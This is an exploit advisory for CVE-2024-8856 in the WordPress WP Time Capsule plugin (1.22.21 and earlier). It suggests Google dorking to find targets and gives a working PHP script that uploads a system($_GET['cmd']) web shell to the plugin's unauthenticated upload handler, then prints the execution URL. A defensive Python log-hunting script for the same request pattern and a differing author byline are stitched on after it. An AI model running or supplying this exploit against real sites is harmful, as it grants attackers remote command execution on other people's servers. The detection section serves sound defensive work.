=============================================================================================================================================
| # Title : WP Time Capsule 1.22.21 PHP Shell Upload vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://fr.wordpress.org/plugins/wp-time-capsule/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Code Description: Exploits an arbitrary file upload vulnerability in the WordPress WP Time Capsule plugin, versions less than or equal to 1.22.21.
(Related: https://packetstorm.news/files/id/183146/ Related CVE numbers: CVE-2024-8856)
[+] Payload :
[+] Set Target : line 17
[+] Usage : php poc.php
[+] PayLoad :
<?php
// Target settings: path to the plugin's bridge upload handler
$target = "http://victim.com/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php";
$payload_name = rand(10,99) . ".php"; // Random file name
$payload_content = "<?php system(\$_GET['cmd']); ?>"; // Simple shell code

// Build the multipart request body
$boundary = "----WebKitFormBoundary" . md5(time());
$eol = "\r\n";
$data = "--" . $boundary . $eol;
$data .= 'Content-Disposition: form-data; name="files"; filename="' . $payload_name . '"' . $eol;
$data .= "Content-Type: application/x-php" . $eol . $eol;
$data .= $payload_content . $eol;
$data .= "--" . $boundary . "--" . $eol;

// Send the request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: multipart/form-data; boundary=" . $boundary));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

// Check the response: the handler echoes the stored file name on success
if (strpos($response, $payload_name) !== false) {
    echo "[+] Payload uploaded successfully: " . $payload_name . "\n";
    echo "[+] Execution URL: http://victim.com/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/$payload_name?cmd=whoami\n";
} else {
    echo "[-] Failed to upload the payload.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
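
For defenders, the request pattern in the PoC above (a POST to the plugin's wp-tcapsule-bridge/upload/php/ handler, then a request for a script file in that same directory) can be hunted in web server access logs. The following is an added example, not part of the original advisory or of the plugin; it assumes Apache/nginx "combined" format logs, and the function name, finding labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Directory taken from the advisory's $target URL; uploads land beside index.php.
UPLOAD_DIR = "/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/"
# Extensions commonly executed as PHP (assumption: depends on server configuration).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Assumption: "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_abuse(lines):
    """Return (line_no, client_ip, kind, status) for requests matching the PoC's pattern."""
    posters = set()   # clients already seen POSTing to the upload handler
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        # Drop the query string, decode %-escapes and fold case before matching.
        path = unquote(m["uri"].split("?", 1)[0]).lower()
        if not path.startswith(UPLOAD_DIR):
            continue
        name = path[len(UPLOAD_DIR):]
        ip, status = m["ip"], int(m["status"])
        if m["method"] == "POST" and name in ("", "index.php"):
            posters.add(ip)
            findings.append((lineno, ip, "upload_post", status))
        elif name != "index.php" and SCRIPT_EXT.search(name):
            # A script other than the handler itself should never exist here.
            kind = "script_hit_after_upload" if ip in posters else "script_hit"
            findings.append((lineno, ip, kind, status))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
_BASE = "/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/"
SAMPLE_LOG = [
    '198.51.100.20 - - [12/Mar/2025:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2025:10:02:11 +0000] "POST ' + _BASE + 'index.php HTTP/1.1" 200 312 "-" "curl/8.5.0"',
    '203.0.113.7 - - [12/Mar/2025:10:02:15 +0000] "GET ' + _BASE + '42.php?cmd=whoami HTTP/1.1" 200 18 "-" "curl/8.5.0"',
    '198.51.100.20 - - [12/Mar/2025:10:05:00 +0000] "GET ' + _BASE + '77.PHP HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

A `script_hit_after_upload` finding with status 200 is the highest-priority result: the same client posted to the handler and then reached a script that should not exist in that directory.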
WP Time Capsule 1.22.21 Shell Upload
- Written by: khalil shreateh
- Category: Vulnerabilities